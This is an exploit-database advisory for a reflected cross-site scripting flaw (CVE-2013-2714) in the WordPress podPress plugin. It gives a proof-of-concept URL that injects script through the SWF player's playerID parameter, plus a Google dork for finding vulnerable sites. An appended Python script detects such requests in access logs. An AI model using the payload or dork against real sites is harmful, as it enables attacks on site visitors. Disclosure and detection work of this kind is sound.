WordPress podPress 8.8.10.13 Cross Site Scripting

2013-03-29T00:00:00
ID PACKETSTORM:121011
Type packetstorm
Reporter hip
Modified 2013-03-29T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress podPress Plugin XSS in SWF  
# Release Date: 28/03/13  
# Author: hip [Insight-Labs]  
# Contact: hip@insight-labs.org | Website: http://insight-labs.org  
# Software Link: http://downloads.wordpress.org/plugin/podpress.8.8.10.17.zip  
# Tested on: XPsp3  
# Affected versions: 8.8.10.13 and earlier  
# Google Dork: inurl:/wp-content/plugins/podpress/  
# REF:CVE-2013-2714  
———————————————————————————————————————–  
# Introduction:  
podPress adds a lot of features designed to make WordPress the ideal platform for hosting a podcast.  
————————————————————————————————————————-  
# XSS – Proof Of Concept:  
vulnerable path:  
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf  
vulnerable parameter: playerID  
POC:  
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//  
————————————————————————————————————————-  
————  
Patch:  
————  
– Vendor was notified on the 25/02/2013  
– Vendor released version 8.8.10.17 on 19/03/2013, fixing the bug  
————————————————————————————————————————-  
`
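
For sites that ran an affected version, the following is an added example (not part of the original advisory) that scans web access logs for requests to the vulnerable SWF path whose `playerID` value is not a plain identifier. The allowlist pattern, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Path and parameter name are taken from the advisory.
SWF_PATH = "/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf"
PARAM = "playerid"
# Assumption: legitimate player IDs are short plain identifiers.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Mar/2013:10:00:00 +0000] "GET ' + SWF_PATH + '?playerID=1 HTTP/1.1" 200 1024',
    '203.0.113.9 - - [29/Mar/2013:10:00:05 +0000] "GET ' + SWF_PATH + '?playerID=%253Cb%253E HTTP/1.1" 200 1024',
    '203.0.113.9 - - [29/Mar/2013:10:00:09 +0000] "GET /index.php?playerID=%3Cb%3E HTTP/1.1" 200 512',
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_player_ids(line):
    """Return decoded playerID values in one log line that fail the allowlist."""
    match = REQUEST.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not fully_decode(url.path).lower().endswith(SWF_PATH):
        return []
    values = [fully_decode(v) for k, v in parse_qsl(url.query) if k.lower() == PARAM]
    return [v for v in values if not SAFE_ID.fullmatch(v)]


def scan(lines):
    """Return (line_number, flagged_values) for every line with a hit."""
    hits = [(n, suspicious_player_ids(entry)) for n, entry in enumerate(lines, 1)]
    return [(n, bad) for n, bad in hits if bad]


if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(number, bad)
```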